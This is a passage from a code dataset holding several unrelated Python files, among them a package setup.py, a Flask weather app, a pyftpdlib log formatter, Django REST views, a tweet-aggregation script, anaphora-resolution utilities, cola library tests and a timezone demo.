main()","repo_name":"Nesquick0/Adventofcode","sub_path":"2020/01/01.py","file_name":"01.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7514704684","text":"#!/usr/bin/env python\n# coding: utf-8\n\nfrom setuptools import setup, find_packages\nfrom holiday import (\n __version__,\n __license__,\n __author__,\n __author_email__,\n)\n\n__name__ = 'holiday'\n__url__ = 'https://github.com/wanshot/holiday'\n\n__short_description__ = __name__ + ' is a package to generate holiday.'\n__long_description__ = open('./README.rst', 'r').read()\n\n__classifiers__ = [\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python',\n 'Development Status :: 5 - Production/Stable',\n 'Topic :: Software Development',\n 'Programming Language :: Python :: 2',\n]\n\n__keywords__ = [\n 'datetime',\n 'date',\n 'time',\n 'calendar',\n]\n\nsetup(\n name=__name__,\n version=__version__,\n description=__short_description__,\n long_description=__long_description__,\n url=__url__,\n author=__author__,\n author_email=__author_email__,\n classifiers=__classifiers__,\n keywords=' ,'.join(__keywords__),\n license=__license__,\n packages=find_packages(exclude=['tests']),\n)\n","repo_name":"wanshot/holiday","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5087213649","text":"import requests\r\nfrom flask import Flask, render_template, request, redirect, url_for, flash\r\nfrom flask_sqlalchemy import SQLAlchemy \r\nfrom bs4 import BeautifulSoup\r\n\r\napp = Flask(__name__)\r\napp.config['DEBUG'] = True\r\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///weather.db'\r\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\r\napp.config['SECRET_KEY'] = 'thisisasecret'\r\n\r\ndb = SQLAlchemy(app)\r\n\r\nclass City(db.Model):\r\n id = db.Column(db.Integer, primary_key=True)\r\n name = db.Column(db.String(50), nullable=False)\r\n\r\ndef get_weather_data(city):\r\n url = f'http://api.openweathermap.org/data/2.5/weather?q={ city }&units=imperial&appid=271d1234d3f497eed5b1d80a07b3fcd1'\r\n r = requests.get(url).json()\r\n return r\r\n\r\n@app.route('/')\r\ndef index_get():\r\n cities = City.query.all()\r\n\r\n weather_data = []\r\n\r\n for city in cities:\r\n\r\n r = get_weather_data(city.name)\r\n print(r)\r\n\r\n weather = {\r\n 'city' : city.name,\r\n 'temperature' : r['main']['temp'],\r\n 'description' : r['weather'][0]['description'],\r\n 'icon' : r['weather'][0]['icon'],\r\n }\r\n\r\n weather_data.append(weather)\r\n\r\n\r\n return render_template('weather.html', weather_data=weather_data)\r\n\r\n@app.route('/', methods=['POST'])\r\ndef index_post():\r\n err_msg = ''\r\n new_city = request.form.get('city')\r\n\r\n city = request.form.get('city')\r\n url_new = \"https://www.wunderground.com/weather/in/\"+city+\"\"\r\n rr = requests.get(url_new)\r\n data = rr.content\r\n soup = BeautifulSoup(data, 'html.parser')\r\n deg = soup.find_all('span',class_=\"wu-value wu-value-to\")[0].get_text()\r\n \r\n print(\"\\n\\n\\n\\nWEATHER REPORT FROM WUNDERGROUND.COM\")\r\n print(\"\\nTHE CURRENT WEATHER OF \"+city+ \" IS: \"+deg+\"°F\\n\\n\\n\\n\")\r\n \r\n if new_city:\r\n existing_city = City.query.filter_by(name=new_city).first()\r\n\r\n if not existing_city:\r\n new_city_data = get_weather_data(new_city)\r\n\r\n if new_city_data['cod'] == 200:\r\n new_city_obj = 
City(name=new_city)\r\n\r\n                db.session.add(new_city_obj)\r\n                db.session.commit()\r\n            else:\r\n                err_msg = 'City does not exist in the world!'\r\n        else:\r\n            err_msg = 'City already exists in the database!'\r\n\r\n    if err_msg:\r\n        flash(err_msg, 'error')\r\n    else:\r\n        flash('City added successfully!')\r\n\r\n    return redirect(url_for('index_get'))\r\n\r\n@app.route('/delete/<name>')\r\ndef delete_city(name):\r\n    city = City.query.filter_by(name=name).first()\r\n    db.session.delete(city)\r\n    db.session.commit()\r\n\r\n    flash(f'Successfully deleted { city.name }', 'success')\r\n    return redirect(url_for('index_get'))","repo_name":"Sumesh42/weather-app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10383094658","text":"import logging\nimport sys\nimport time\ntry:\n    import curses\nexcept ImportError:\n    curses = None\n\nfrom pyftpdlib._compat import unicode\n\n\n# default logger\nlogger = logging.getLogger('pyftpdlib')\n\n\ndef _stderr_supports_color():\n    color = False\n    if curses is not None and sys.stderr.isatty():\n        try:\n            curses.setupterm()\n            if curses.tigetnum(\"colors\") > 0:\n                color = True\n        except Exception:\n            pass\n    return color\n\n# configurable options\nLEVEL = logging.INFO\nPREFIX = '[%(levelname)1.1s %(asctime)s]'\nCOLOURED = _stderr_supports_color()\nTIME_FORMAT = \"%y-%m-%d %H:%M:%S\"\n\n\n# taken and adapted from Tornado\nclass LogFormatter(logging.Formatter):\n    \"\"\"Log formatter used in pyftpdlib.\n    Key features of this formatter are:\n\n    * Color support when logging to a terminal that supports it.\n    * Timestamps on every log line.\n    * Robust against str/bytes encoding problems.\n    \"\"\"\n    def __init__(self, *args, **kwargs):\n        logging.Formatter.__init__(self, *args, **kwargs)\n        self._coloured = COLOURED and _stderr_supports_color()\n        if self._coloured:\n            curses.setupterm()\n            # The curses module has some str/bytes confusion in\n            # python3. Until version 3.2.3, most methods return\n            # bytes, but only accept strings. In addition, we want to\n            # output these strings with the logging module, which\n            # works with unicode strings. The explicit calls to\n            # unicode() below are harmless in python2 but will do the\n            # right conversion in python 3.\n            fg_color = (curses.tigetstr(\"setaf\") or curses.tigetstr(\"setf\")\n                        or \"\")\n            if (3, 0) < sys.version_info < (3, 2, 3):\n                fg_color = unicode(fg_color, \"ascii\")\n            self._colors = {\n                # blues\n                logging.DEBUG: unicode(curses.tparm(fg_color, 4), \"ascii\"),\n                # green\n                logging.INFO: unicode(curses.tparm(fg_color, 2), \"ascii\"),\n                # yellow\n                logging.WARNING: unicode(curses.tparm(fg_color, 3), \"ascii\"),\n                # red\n                logging.ERROR: unicode(curses.tparm(fg_color, 1), \"ascii\")\n            }\n            self._normal = unicode(curses.tigetstr(\"sgr0\"), \"ascii\")\n\n    def format(self, record):\n        try:\n            record.message = record.getMessage()\n        except Exception:\n            err = sys.exc_info()[1]\n            record.message = \"Bad message (%r): %r\" % (err, record.__dict__)\n\n        record.asctime = time.strftime(TIME_FORMAT,\n                                       self.converter(record.created))\n        prefix = PREFIX % record.__dict__\n        if self._coloured:\n            prefix = (self._colors.get(record.levelno, self._normal) +\n                      prefix + self._normal)\n\n        # Encoding notes: The logging module prefers to work with character\n        # strings, but only enforces that log messages are instances of\n        # basestring. 
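(On Python 3 this is less of a problem, since str is always unicode.) 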
In python 2, non-ascii bytestrings will make\n # their way through the logging framework until they blow up with\n # an unhelpful decoding error (with this formatter it happens\n # when we attach the prefix, but there are other opportunities for\n # exceptions further along in the framework).\n #\n # If a byte string makes it this far, convert it to unicode to\n # ensure it will make it out to the logs. Use repr() as a fallback\n # to ensure that all byte strings can be converted successfully,\n # but don't do it by default so we don't add extra quotes to ascii\n # bytestrings. This is a bit of a hacky place to do this, but\n # it's worth it since the encoding errors that would otherwise\n # result are so useless (and tornado is fond of using utf8-encoded\n # byte strings wherever possible).\n try:\n message = unicode(record.message)\n except UnicodeDecodeError:\n message = repr(record.message)\n\n formatted = prefix + \" \" + message\n if record.exc_info:\n if not record.exc_text:\n record.exc_text = self.formatException(record.exc_info)\n if record.exc_text:\n formatted = formatted.rstrip() + \"\\n\" + record.exc_text\n return formatted.replace(\"\\n\", \"\\n \")\n\n\ndef _config_logging():\n channel = logging.StreamHandler()\n channel.setFormatter(LogFormatter())\n logger = logging.getLogger('pyftpdlib')\n logger.setLevel(LEVEL)\n logger.addHandler(channel)\n","repo_name":"timburgess/brackets-ftp-sync","sub_path":"src/node/node_modules/jsftp/node_modules/ftp-test-server/pyftpdlib/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":4604,"program_lang":"python","lang":"en","doc_type":"code","stars":105,"dataset":"github-code","pt":"53"} +{"seq_id":"13253991848","text":"from django.shortcuts import get_object_or_404\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom rest_framework import status\n\n#from heros_vs_villains.supers.serializers import SuperSerializer\nfrom .serializers import SuperSerializer\nfrom .models import Supers\nfrom supers import serializers\nfrom super_types.models import SuperType\n\n\n@api_view(['GET','POST'])\ndef supers_list(request):\n \n if request.method == 'GET':\n \n type_param = request.query_params.get('type')\n\n supers = Supers.objects.all()\n\n if type_param:\n supers = supers.filter(super_type_id__type=type_param)\n\n\n\n super_types = SuperType.objects.all()\n\n custom_response_dictionary = {}\n\n for super_type in super_types:\n\n supers = Supers.objects.filter(super_type_id = super_type.id)\n \n super_serializer = SuperSerializer(supers, many=True)\n\n custom_response_dictionary[super_type.type] = super_serializer.data\n \n\n\n\n # super_serializer = SuperSerializer(supers, many=True)\n\n # return Response(serializer.data)\n\n # super_types = SuperType.objects.all()\n\n # custom_response_dictionary = {}\n \n # for super in supers:\n # supers = Supers.objects.filter(super_type_id = super.super_type_id)\n\n # serializer = SuperSerializer(supers, many=True)\n\n # custom_response_dictionary[super.name] = {\n # \"type\": super_serializer.data\n # }\n return Response(custom_response_dictionary)\n\n elif request.method == 'POST':\n serializer = SuperSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n \n\n@api_view(['GET','PUT','DELETE'])\ndef supers_details(request, pk):\n super = get_object_or_404(Supers, pk=pk)\n if request.method == 'GET':\n serializer = SuperSerializer(super)\n 
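# serialize the requested Supers instance and return it as JSON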
return Response(serializer.data)\n    elif request.method == 'PUT':\n        serializer = SuperSerializer(super, data=request.data)\n        serializer.is_valid(raise_exception=True)\n        serializer.save()\n        return Response(serializer.data)\n    elif request.method == 'DELETE':\n        super.delete()\n        return Response(status=status.HTTP_204_NO_CONTENT)\n","repo_name":"ctaylor0002/Heros-vs-Villains","sub_path":"heros_vs_villains/supers/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27878706714","text":"import pandas as pd\nimport regex as re\nimport os\n\ntimeframe = '15min'\n\ndef transform(df):\n    df.index = pd.DatetimeIndex(df['datetime'])\n    df['tweet_count'] = df['datetime']\n    order = df.columns\n    return df.resample(timeframe).agg({'datetime': 'first', 'followers': 'sum', 'compound_sum': 'sum', 'compound_mean': 'mean', 'followers_compound': 'sum', 'positive_sum': 'sum', 'positive_mean': 'mean', 'followers_positive': 'sum', 'neutral_sum': 'sum', 'neutral_mean': 'mean', 'followers_neutral': 'sum', 'negative_sum': 'sum', 'negative_mean': 'mean', 'followers_negative': 'sum', 'tweet_count': 'count'})[order]\n\ninput_filename = \"data/interim/live_tweets_expanded.csv\"\noutput_filename = \"data/interim/live_tweets_aggregated_\"+ timeframe +\".csv\"\ncolumns = ['datetime', 'followers', 'compound_sum', 'compound_mean', 'followers_compound', 'positive_sum', 'positive_mean', 'followers_positive', 'neutral_sum', 'neutral_mean', 'followers_neutral', 'negative_sum', 'negative_mean', 'followers_negative']\n\ndef save(data):\n    data.to_csv(output_filename, header='column_names', index=False)\n\ndata = pd.read_csv(input_filename, usecols=columns)\ndata = transform(data)\nsave(data)","repo_name":"gorilazish/crypto-predict","sub_path":"src/features/aggregate_tweets.py","file_name":"aggregate_tweets.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"662507931","text":"import re\nimport torch\nfrom sklearn.model_selection import train_test_split\nimport json\nimport pandas as pd\nfrom nltk.corpus import wordnet\n\ndef span_to_span_idx(span):\n    '''Turn a string span into a span idx of the whole context\n    @param span:\n        str: a span str from the doc e.g. 'word_5..word_7'\n    @return:\n        list: a min max span e.g. [4, 6]\n    '''\n    span = re.findall(r'\\d+', span)\n    # Because span: in AR & VZ: 'word_5..word_5', but in IS: 'word_5'\n    if len(span) < 2:\n        span_idx = [int(span[0])-1, int(span[0])]\n    else:\n        span_idx = [int(span[0])-1, int(span[1])]\n    return span_idx\n\ndef span_idx_to_str_slice(left:int, right:int):\n    '''Convert span idx to a slice in string\n    e.g. 
(1, 2) => '[1:2]'\n    @param left: start index\n    @param right: end index\n    @return: a slice in string\n    '''\n    return '[' + str(left) + ':' + str(right) + ']'\n\ndef to_cuda(x):\n    \"\"\" GPU-enable a tensor \"\"\"\n    if torch.cuda.is_available():\n        x = x.cuda()\n    return x\n\ndef batch(iterable, batch_size=1):\n    length = len(iterable)\n    for ndx in range(0, length, batch_size):\n        yield iterable[ndx:min(ndx + batch_size, length)]\n\ndef split_train_set(X):\n    '''Split the dataset into training, validation and test sets\n    @param X:\n    @return:\n    '''\n    # SORTED\n    X.sort(key=lambda x: x.file_name, reverse=False)\n    y = get_all_gold_labels(X)\n    # STAY SORTED\n    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=None, shuffle=False)\n    # print([x.file_name for x in X_train])\n    # print(X_train, y_train, X_test,y_test)\n    return X_train, y_train, X_test,y_test\n\ndef assign_label(sigmoid_score):\n    ''' All the score <= 0.5 will be assigned to 0 and > 0.5 will be assigned to 1.\n    @param sigmoid_score: Tensor\n    @return: int: 1 or 0\n    '''\n    score = float(sigmoid_score)\n    if score > 0.5:\n        return 1\n    else:\n        return 0\n\ndef get_all_gold_labels(corpus):\n    '''Get all gold labels of the whole corpus(all the anaphors)\n    @param corpus: a list of all the anaphor objects\n    @return: a list of gold labels of the whole corpus(all the anaphors)\n    '''\n    corpus_labels = []\n    for ana in corpus:\n        # find out the gold label and the coreferences of this anaphor\n        ana_gold_and_corefs = ana.golds_ids # AS CORRECT: GOLD LABEL AND ITS COREFERENCES\n        # if the anaphor has corefs\n\n        potentials_selfs_and_corefs = [p.coref_id for p in ana.potential_antecedents] # list of lists\n\n        # PRODUCE BINARY LABEL for every anaphor(the whole corpus)\n        potentials_labels_per_ana = []\n        for p_self_and_corefs in potentials_selfs_and_corefs:\n            # if any p_corefs same as any ana_corefs_ids\n            if any(x in p_self_and_corefs for x in ana_gold_and_corefs):\n                potentials_labels_per_ana.append(1)\n            else:\n                potentials_labels_per_ana.append(0)\n        corpus_labels.append(potentials_labels_per_ana)\n\n    return corpus_labels\n\n\ndef my_3d_concat(t1, t2):\n    ''' Concatenate 2 3d tensors (because torch.cat cannot do it directly due to a size mismatch)\n    @param t1: torch.tensor\n    @param t2: torch.tensor\n    @return: a concatenation of the 2 tensors\n    '''\n    all = []\n    for a1, b1 in zip(t1, t2):\n        # print(a1, b1)\n        all.append(torch.cat([a1, b1], 1))\n    return torch.stack(all)\n\ndef get_batch_distance_features_matrixs(docs):\n    ''' get a batch of the distance features matrix of all the candidates of each anaphor\n    @param docs: a list of anaphor objects\n    @return: a list of a batch the distance features matrix of all the candidates of each anaphor\n    '''\n    return [ana['candidates_distance_features_matrix'] for ana in docs] # [ana[potentials]]\n\ndef get_batch_grammar_features_matrixs(docs):\n    ''' get a batch of the grammatical roles features matrix of all the candidates of each anaphor\n    @param docs: a list of anaphor objects\n    @return: a list of a batch the grammatical roles features matrix of all the candidates of each anaphor\n    '''\n\n    return [ana['candidates_deps_features_matrix'] for ana in docs] # [ana[potentials]]\n\ndef get_batch_definiteness_features_matrixs(docs):\n    ''' get a batch of the definiteness features matrix of all the candidates of each anaphor\n    @param docs: a list of anaphor objects\n    @return: a list of a batch the definiteness features matrix of all the candidates of each anaphor\n    '''\n\n    return 
[ana['candidates_definiteness_features_matrix'] for ana in docs] # [ana[potentials]]\n\ndef get_batch_match_features_scores(docs):\n    return [ana['candidates_string_match_features'] for ana in docs] # [ana[potentials]]\n\ndef get_batch_synonym_features_scores(docs):\n    return [ana['candidates_synonym_features'] for ana in docs] # [ana[potentials]]\n\ndef get_batch_hypernym_features_scores(docs):\n    return [ana['candidates_hypernym_features'] for ana in docs] # [ana[potentials]]\n\ndef remove_duplicantes_in_ontonotes():\n    remove = 0\n\n    ontonotes_df = pd.read_csv('/home/students/huang/Documents/corpus/ontonotes-5.0-conll-2012/preprocessed/ontonotes_retrieval.csv', sep='\\t', index_col=[0])\n    print('original ontonotes: ', len(ontonotes_df))\n\n    main_df = pd.read_csv('/home/students/huang/Documents/corpus/Dataset_comparative_anaphora_resolution/preprocessed/annotation_retrieval.csv', sep='\\t', index_col=[0])\n\n    main_corpus_files_names = [row['file_name'].split('.')[0] for index, row in main_df.iterrows()]\n\n    for index, row in ontonotes_df.iterrows():\n        file_name = row['file_name'].split('.')[0]\n        if file_name in main_corpus_files_names:\n            remove += 1\n            ontonotes_df.drop(index, inplace=True)\n\n\n    print('main_corpus: ', len(main_df))\n    print('ontonotes: ', len(ontonotes_df))\n    print('removed: ', remove)\n\n    save_to_path = '../../corpus/ontonotes-5.0-conll-2012/preprocessed/ontonotes_retrieval_no_dups.csv'\n    ontonotes_df.to_csv(save_to_path, sep='\\t')\n\ndef load_corpus_list():\n    with open(\"../k_folds_corpus/ontonotes/ontonotes___holdout_Xtrain_ytrain_Xval_yval_Xtest_ytest.txt\", 'r') as f:\n        train_val_test_corpus = json.load(f)\n\n    return train_val_test_corpus\n\n\ndef get_semantic_feature_definiteness(children_of_head):\n    definite = [\"the\", \"all\", \"both\", \"either\", \"neither\", \"no\", \"none\"]\n    indefinite = [\"a\", \"an\", \"each\", \"every\", \"some\", \"any\", \"few\", \"several\", \"many\", \"much\", \"little\", \"most\", \"more\",\n                  \"fewer\", \"less\"]\n    demonstrative = ['this', 'these', 'that', 'those']\n\n    if any(x in definite for x in children_of_head):\n        return 'definite'\n    elif any(x in indefinite for x in children_of_head):\n        return 'indefinite'\n    elif any(x in demonstrative for x in children_of_head):\n        return 'demonstrative'\n\n\ndef get_word_synonyms_from_sent(word, sent):\n    word_synonyms = []\n    for synset in wordnet.synsets(word):\n        for lemma in synset.lemma_names():\n            if lemma in sent and lemma != word:\n                word_synonyms.append(lemma)\n    return word_synonyms","repo_name":"jinhuang-de/BA-Resolving-comparative-anaphora-with-and-without-lexical-heads","sub_path":"src/ontonotes_utils.py","file_name":"ontonotes_utils.py","file_ext":"py","file_size_in_byte":7066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39572661259","text":"import numpy as np\nfrom cola.ops import Diagonal\nfrom cola.linalg.tbd.slq import stochastic_lanczos_quad\nfrom cola.fns import lazify\nfrom cola.utils.test_utils import get_xnp, parametrize, relative_error\nfrom cola.backends import all_backends\nfrom cola.utils.test_utils import generate_spectrum, generate_pd_from_diag\n\n\n# @parametrize(tracing_backends)\n@parametrize(['torch'])\ndef test_slq_vjp(backend):\n    xnp = get_xnp(backend)\n    dtype = xnp.float32\n    diag = xnp.Parameter(xnp.array([3., 4., 5.], dtype=dtype, device=None))\n    diag_soln = xnp.Parameter(xnp.array([3., 4., 5.], dtype=dtype, device=None))\n    _, unflatten = Diagonal(diag).flatten()\n\n    def f(theta):\n        A = 
unflatten([theta])\n loss = stochastic_lanczos_quad(A, xnp.log, vtol=1 / 10, max_iters=100, tol=1e-6, pbar=False)\n return loss\n\n def f_alt(theta):\n X = xnp.diag(theta)\n loss = xnp.logdet(X)\n return loss\n\n out = f(diag)\n if backend == 'torch':\n out.backward()\n approx = diag.grad.clone()\n else:\n approx = xnp.grad(f)(diag)\n assert approx is not None\n\n out = f_alt(diag_soln)\n if backend == 'torch':\n out.backward()\n soln = diag_soln.grad.clone()\n else:\n soln = xnp.grad(f_alt)(diag)\n\n rel_error = relative_error(soln, approx)\n assert rel_error < 1e-1\n\n\n@parametrize(all_backends)\ndef test_stochastic_lanczos_quad_random(backend):\n xnp = get_xnp(backend)\n dtype = xnp.float32\n diag = generate_spectrum(coeff=0.5, scale=1.0, size=10, dtype=np.float32)\n A = xnp.array(generate_pd_from_diag(diag, dtype=diag.dtype), dtype=dtype, device=None)\n\n def fun(x):\n return xnp.log(x)\n\n soln = xnp.sum(fun(xnp.array(diag, dtype=dtype, device=None)))\n vtol, max_iters, tol = 1 / np.sqrt(70), A.shape[0], 1e-7\n B = lazify(A)\n approx = stochastic_lanczos_quad(B, fun, max_iters=max_iters, tol=tol, vtol=vtol)\n\n rel_error = relative_error(soln, approx)\n assert rel_error < 1e-1\n","repo_name":"wilson-labs/cola","sub_path":"tests/algorithms/test_stochastic_lanczos_quad.py","file_name":"test_stochastic_lanczos_quad.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","stars":233,"dataset":"github-code","pt":"53"} +{"seq_id":"24345789831","text":"\"\"\"\nDevice/Hardware specific python classes\n\"\"\"\nfrom typing import List\nimport abc\nfrom openhab_ds import *\nfrom configs import get_esphome_openhab_config, get_device_configs\n\n\n# ######### Some global objects################\non_command = ChannelCommand('on', 'ON')\noff_command = ChannelCommand('off', 'OFF')\n\n\nclass RootDev(object):\n def __init__(self, device: dict):\n self.device_data = device\n self.name = device.get('name')\n # Below will be updated in derived class\n self.thing_id = None\n self.items_dict: List[dict] = None\n\n @abc.abstractmethod\n def create_thing(self) -> OHThingBase:\n pass\n\n @abc.abstractmethod\n def get_thing(self) -> OHThingBase:\n pass\n\n @abc.abstractmethod\n def create_items(self) -> List[OHItem]:\n pass\n\n\nclass MqttDev(RootDev):\n def __init__(self, mqtt_bridge: OHMqttBridge, device: dict, dev_type: str):\n super(MqttDev, self).__init__(device)\n self.mqtt_bridge = mqtt_bridge\n self.channels: List[OHChannel] = None\n self.thing_id = device['id']\n self.dev_type = dev_type\n self.groups = device.get('groups', [])\n self.items_dict = device.get('items', [])\n self.thing: OHMqttThings = self.create_thing()\n\n def create_thing(self) -> OHThingBase:\n device = self.device_data\n device_config = get_device_configs()\n bridge = self.mqtt_bridge\n if not bridge:\n print('[things] Error: mqtt_broker configuration is required for mqtt devices.',\n f'mqtt is used for {device[\"name\"]} ({device[\"id\"]}).')\n raise ValueError('mqtt configuration missing')\n\n # check inside bridge if this device is already added\n for thing in bridge.get_things():\n if thing.get_thing_id() == device['id']:\n return thing\n\n thing = OHMqttThings(device['id'], device['name'])\n channels = self.create_channels(device['id'], device_config[self.dev_type])\n thing.add_channels(channels)\n bridge.add_thing(thing)\n # add thing reference to channels\n list(map(lambda x: x.add_thing(thing), channels))\n # add bridge reference to thing\n thing.add_bridge(bridge)\n\n 
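# keep a reference to the created channels on this device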
self.channels = channels\n return thing\n\n def get_thing(self) -> OHThingBase:\n # for mqtt device bridge will have all the things\n return self.mqtt_bridge\n\n def create_channels(self, dev_id: str, dev_config: dict) -> List[OHChannel]:\n channels = []\n esphab_config = get_esphome_openhab_config()\n\n for entity in dev_config:\n channel_type = self.get_channel_type(entity, esphab_config)\n\n # entity is having child members (Ex- wifi_signal, touch_key0, relay_0 etc.)\n children = dev_config[entity]\n if not children:\n # entity which is not having any member (Ex- status, debug)\n children = [entity]\n\n # if entity is 'light', change the format\n if entity == 'light':\n children = list(map(lambda x: x['id'], children))\n\n for entity_child in children:\n channel_name = f'ch_{entity_child}_{dev_id}'\n channel = OHChannel(channel_type, channel_name, entity_child)\n commands = self.get_channel_commands(entity, esphab_config, dev_id, entity_child)\n channel.add_commands(commands)\n channels.append(channel)\n # end inner for\n # end for\n\n return channels\n\n def get_channel_commands(self, entity: str, esphab_config: dict, device_id: str, entity_child: str = '') \\\n -> List[ChannelCommand]:\n # supported openhab commands, ex- stateTopic, commandTopic\n command_oh = esphab_config['openhab_ch'][entity]['channels']\n # mqtt topics defined for entity type, ex- state, command\n topics = esphab_config['esphome'][entity]\n no_child_topic_flag = False\n if not topics:\n topics = [x for x in range(len(command_oh))] # No special topic for entities like status and debug.\n no_child_topic_flag = True\n\n commands = []\n for topic in topics:\n if no_child_topic_flag and entity != entity_child:\n mqtt_topic = f'{device_id}/{entity}/{entity_child}'\n elif no_child_topic_flag:\n mqtt_topic = f'{device_id}/{entity}'\n else:\n mqtt_topic = f'{device_id}/{entity}/{entity_child}/{topic}'\n command = ChannelCommand(command_oh[topic], mqtt_topic)\n commands.append(command)\n\n # add the ON and OFF in case of switch\n if entity == 'switch':\n commands.append(on_command)\n commands.append(off_command)\n\n return commands\n\n def get_channel_type(self, entity: str, esphab_config: dict) -> str:\n channel_type = 'String'\n if entity in esphab_config['openhab_ch']:\n channel_type = esphab_config['openhab_ch'][entity]['datatype']\n return channel_type\n\n def create_items(self) -> List[OHItem]:\n if 'items' not in self.device_data:\n print('[items] No items found for device', self.device_data['name'])\n return []\n\n all_items = []\n for item_data in self.device_data['items']:\n if isinstance(item_data, str):\n # raw item\n item = OHItem(raw_item=item_data)\n all_items.append(item)\n elif 'item_type' in item_data:\n channel = self.get_channel(item_data['id'])\n created_items = self.create_item(item_data, self.groups, channel)\n all_items.extend(created_items)\n return all_items\n\n def get_channel(self, item_id: str) -> OHChannel:\n channel = next(filter(lambda x: x.get_entity_name() == item_id, self.thing.get_channels()), None)\n if not channel:\n raise ValueError(f'[items] device_config.yaml is not having \\'{item_id}\\' for device \\'{self.thing_id}\\'.')\n return channel\n\n def create_item(self, item_data: dict, parent_groups: List[str], channel: OHChannel) -> List[OHItem]:\n item_name = f'{item_data[\"id\"]}_{self.thing_id}'\n item = OHItem(name=item_name, **item_data)\n item.add_groups(parent_groups)\n item.set_device_id(self.thing_id)\n\n created_items = [item]\n # create updater items (for lights or any 
other)\n        if 'update_mode' in item_data:\n            # add group in last created item (this group will take input from UI)\n            item.add_group(item_data['update_mode'])\n\n            # additional item\n            item_name = item_data['update_mode'] + '_' + item_name\n            item = OHItem(name=item_name, main_ui='no')\n            item.add_groups(parent_groups)\n            item.add_group('esp_' + item_data['update_mode']) # this group will receive input from esp and update UI\n            if 'groups' in item_data:\n                item.add_groups(item_data['groups'])\n            created_items.append(item)\n\n        # add the channel in target item\n        item.add_channel(channel)\n\n        return created_items\n\n\nclass EspHomeDev(MqttDev):\n    def __init__(self, mqtt_bridge: OHMqttBridge, device: dict):\n        super(EspHomeDev, self).__init__(mqtt_bridge, device)\n\n\nclass WledDev(RootDev):\n    def __init__(self, device: dict, dev_type: str):\n        super(WledDev, self).__init__(device)\n        self.thing_id = self.get_wled_thing_id(device['id'])\n        self.dev_type = dev_type\n        self.thing = self.create_thing()\n        self.groups = device.get('groups', [])\n\n    def create_thing(self) -> OHThingBase:\n        device = self.device_data\n        thing = OHWledThing(thing_id=self.thing_id, label=device['name'], address=device['id'])\n        return thing\n\n    def get_thing(self) -> OHThingBase:\n        return self.thing\n\n    @staticmethod\n    def get_wled_thing_id(dev_id: str) -> str:\n        thing_id = 'wled_' + dev_id\n        thing_id = thing_id.replace('.', '')\n        return thing_id\n\n    def create_items(self) -> List[OHItem]:\n        device_config = get_device_configs()\n        self.items_dict = self.device_data.get('items') or device_config[self.dev_type]['items']\n\n        all_items = []\n        for item_data in device_config[self.dev_type]['items']:\n            if 'item_type' not in item_data:\n                continue\n            item = self.create_item(item_data, self.groups)\n            all_items.append(item)\n\n        return all_items\n\n    def create_item(self, item_data: dict, parent_groups: List[str]) -> OHItem:\n        item_name = f'{item_data[\"id\"]}_{self.thing_id}'\n        item = OHItem(name=item_name, **item_data)\n        item.add_groups(parent_groups)\n        item.set_device_id(self.thing_id)\n\n        channel = OHChannel(name=item_data['id'], ch_type=item_data['item_type'], entity_name=item_data['label'])\n        channel.add_thing(self.thing)\n        item.add_channel(channel)\n        return item\n","repo_name":"shaeed/openhab_config","sub_path":"python_module/devices.py","file_name":"devices.py","file_ext":"py","file_size_in_byte":9052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38944193932","text":"\"\"\"\r\nThe new Python 3.9.0 release, together with an installable\r\nmodule (tzdata), introduces support for the IANA time zone database.\r\nThis new module makes it possible to access the dates and times of a given\r\nplace with a few simple commands.\r\n\"\"\"\r\n\r\n#pip install tzdata\r\nimport time\r\nfrom zoneinfo import ZoneInfo\r\nfrom datetime import datetime\r\n\r\n#Formatting function\r\ndef datetime_formatter(current_time):\r\n    return current_time.strftime(\"%d-%m-%Y | %H:%M\")\r\n\r\n#Current time\r\ncurrent_time = datetime.now()\r\n\r\n#Call the formatting function with the current time\r\nitalian_format_datetime = datetime_formatter(current_time)\r\nprint(\"Date and time without formatting:\\n\",current_time,\"\\n\") #Print the date without formatting\r\nprint(\"Date and time in Italian format:\\n\", italian_format_datetime,\"\\n\") #Print the date with Italian formatting\r\n\r\n\r\n#Non-local dates and times\r\ncurrent_time_Nairobi = current_time.astimezone(ZoneInfo(\"Africa/Nairobi\"))\r\ncurrent_time_Tokyo = current_time.astimezone(ZoneInfo(\"Asia/Tokyo\"))\r\n\r\n#Call the formatting function with the current time in Nairobi\r\nitalian_format_datetime_Nairobi = datetime_formatter(current_time_Nairobi)\r\n\r\n#Call the formatting function with the current time in Tokyo\r\nitalian_format_datetime_Tokyo = datetime_formatter(current_time_Tokyo)\r\n\r\nprint(\"Date and time in Italian format for Nairobi:\\n\",italian_format_datetime_Nairobi,\"\\n\") #Print the date with Italian formatting\r\n\r\nprint(\"Date and time in Italian format for Tokyo:\\n\",italian_format_datetime_Tokyo,\"\\n\") #Print the date with Italian formatting\r\n","repo_name":"SpaghettiHacks/Codici_Post","sub_path":"TimeZone/TiemZone.py","file_name":"TiemZone.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 